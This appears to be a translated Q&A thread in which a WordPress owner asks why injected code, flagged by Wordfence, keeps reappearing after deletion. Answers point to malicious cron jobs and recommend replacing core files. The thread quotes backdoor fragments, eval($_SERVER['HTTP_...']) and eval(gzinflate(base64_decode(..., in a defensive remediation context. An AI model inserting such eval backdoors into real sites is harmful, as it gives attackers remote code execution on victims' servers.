【发布时间】:2022-12-28 14:15:48
【问题描述】:
我的网站有问题,我从 wordfence 获得有关我的 WordPress 网站被黑的信息
enter image description here add 找到了一个代码eval($_SERVER['HTTP_81DB2B3'] 所以我删除了它但是几秒钟后代码又回来了。有人,请帮助我
【问题讨论】:
-
请提供足够的代码,以便其他人可以更好地理解或重现问题。
标签: wordpress
我的网站有问题,我从 wordfence 获得有关我的 WordPress 网站被黑的信息
enter image description here add 找到了一个代码eval($_SERVER['HTTP_81DB2B3'] 所以我删除了它但是几秒钟后代码又回来了。有人,请帮助我
【问题讨论】:
标签: wordpress
我有一些与此非常相似的东西。转到您的 cPanel 并搜索“Cron Jobs”并向下滚动以查看是否存在任何恶意 cronjobs 设置。您可能有一些看起来像 eval(gzinflate(base64_decode(.... 的内容,它们实际上是导致这种情况再次发生的原因。不是此问题的完整修复,但您必须删除那些 cronjobs 以确保该行代码不会再次出现。除此之外,您还需要确保那些 cronjobs 不会再次出现。使用像 Wordfence 这样的插件(上面也建议)来查找恶意文件,如果它有助于用新文件替换您的主目录(wp-content 和 wp-config 除外)。
【讨论】:
如果您的网站遭到黑客攻击,那么我猜不止 1 个文件受到影响,
情况1: If you are able to access the Wordpress Backend 在这种情况下,如果你能够访问 Wordpress 后端,那么我建议你
案例二:如果您无法访问 Wordpress 后端,则必须使用托管文件管理器或 FTP 手动更新您的 Wordpress。
请注意:请在进行任何更改之前备份您的网站。
【讨论】: